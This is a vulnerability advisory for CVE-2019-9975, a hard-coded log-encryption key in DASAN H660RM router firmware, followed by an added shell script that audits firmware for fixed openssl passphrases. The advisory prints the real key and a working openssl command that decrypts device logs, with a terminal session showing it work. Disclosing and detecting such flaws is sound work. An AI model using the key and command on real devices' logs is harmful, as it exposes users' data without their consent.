syslog_tool.cgi on DASAN H660RM devices with firmware 1.03-0022 uses a hard-coded key for log encryption

DASAN H660RM devices with firmware 1.03-0022 (and possibly others) use a hard-coded key “dasanektks123” for log encryption. Data stored using this key can be decrypted by anyone able to access this key.

This vulnerability was assigned CVE-2019-9975.


A CWE-321 (Use of Hard-coded Cryptographic Key) weakness exists in syslog_tool.cgi:

ENC_PASSWORD="dasanektks123"
TMP_SYSLOG_FOLDER="/tmp/var/log/syslog/"
ENCRYPT_FILE="syslog_`date +%Y_%m_%d_%H_%M_%S`.tar.gz"
COMPRESS_FILE="syslog_compress.tar.gz"

The syslog_tool.cgi script uses OpenSSL’s aes-128-cbc encryption. Logs can be decrypted with the command:

openssl enc -aes-128-cbc -d -k dasanektks123 -in encrypted.tar.gz -out cleartext.tar.gz

Decryption of logs follows.

kali ~/Downloads $ la
total 136K
drwxr-xr-x  2 user user 4.0K Mar  8 21:41 ./
drwx------ 23 user user 4.0K Mar  8 21:41 ../
-rw-r--r--  1 user user 127K Mar  8 20:12 syslog_1970_01_01_00_18_49.tar.gz
kali ~/Downloads $ file *
syslog_1970_01_01_00_18_49.tar.gz: openssl enc'd data with salted password
kali ~/Downloads $ openssl enc -aes-128-cbc -d -k dasanektks123 -in syslog_1970_01_01_00_18_49.tar.gz -out cleartext-syslog_1970_01_01_00_18_49.tar.gz
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
kali ~/Downloads $ file *
cleartext-syslog_1970_01_01_00_18_49.tar.gz: gzip compressed data, max compression, from Unix, original size 735232
syslog_1970_01_01_00_18_49.tar.gz:           openssl enc'd data with salted password
kali ~/Downloads $ tar xvf cleartext-syslog_1970_01_01_00_18_49.tar.gz
data/log/
data/log/messages
kali ~/Downloads $ head data/log/messages
=== [REBOOT REASON] ==============================
POWERBOOT_BY_LOCAL e30ef88d
=== [LOG - BEGIN] ============================
=== [LOG - END] ==============================
Jan  1 00:01:08 kernel: klogd started: BusyBox v1.00 (2017.11.10-07:25+0000)
Jan  1 00:01:08 kernel: Error! phy_I2C_read return value = 0
Jan  1 00:01:08 kernel: u1DevAddr:0x51, u4WordAddr:0x70
Jan  1 00:01:08 kernel: _SIF_DrvRawRead:^M
Jan  1 00:01:08 kernel: Error sub-addr!
Jan  1 00:01:08 kernel: Error! phy_I2C_read return value = 0
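
One way to catch this pattern when reviewing an unpacked firmware image, added here as an example and not taken from the advisory or the vendor's code: the function flags variables that are assigned a fixed literal and then passed to openssl enc as the passphrase. The sample script, its passphrase and its openssl line are constructed; the advisory quotes only the variable assignments.

```shell
#!/bin/sh
# Added example (not from the advisory): flag CWE-321 in unpacked firmware scripts.

# audit_hardcoded_keys DIR
# Prints "file:line:VAR" for every variable that is assigned a fixed literal
# and then handed to `openssl enc` as the passphrase (-k or -pass pass:).
# Heuristic: single-line commands only, assignment must precede use.
audit_hardcoded_keys() {
    find "$1" -type f \( -name '*.cgi' -o -name '*.sh' \) | sort |
    while IFS= read -r f; do
        awk -v file="$f" '
            # NAME=literal with no $ or backtick expansion on the line
            /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=[^$`]+$/ {
                name = $0
                sub(/^[ \t]*/, "", name)
                sub(/=.*/, "", name)
                assigned[name] = FNR
            }
            /openssl[ \t]+enc/ {
                for (name in assigned) {
                    use = "(-k[ \t]+|-pass[ \t]+\"?pass:)\"?[$][{]?" name "[}]?([^A-Za-z0-9_].*)?$"
                    if ($0 ~ use)
                        print file ":" assigned[name] ":" name
                }
            }
        ' "$f"
    done
}

# Constructed sample modelled on the variables quoted above; the openssl
# line is an assumption, the advisory does not show the script's command.
write_sample() {
    mkdir -p "$1/cgi-bin"
    cat > "$1/cgi-bin/sample_tool.cgi" <<'EOF'
#!/bin/sh
ENC_PASSWORD="example-fixed-passphrase"
TMP_SYSLOG_FOLDER="/tmp/var/log/syslog/"
ENCRYPT_FILE="syslog_`date +%Y_%m_%d`.tar.gz"
COMPRESS_FILE="syslog_compress.tar.gz"
openssl enc -aes-128-cbc -k $ENC_PASSWORD -in $TMP_SYSLOG_FOLDER$COMPRESS_FILE -out $TMP_SYSLOG_FOLDER$ENCRYPT_FILE
EOF
}

demo_root=$(mktemp -d)
write_sample "$demo_root"
audit_hardcoded_keys "$demo_root"
rm -rf "$demo_root"
```

Only ENC_PASSWORD is reported for the sample: the path variables are literals too, but they are not used as the passphrase, and ENCRYPT_FILE is skipped because it is built from a command substitution.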
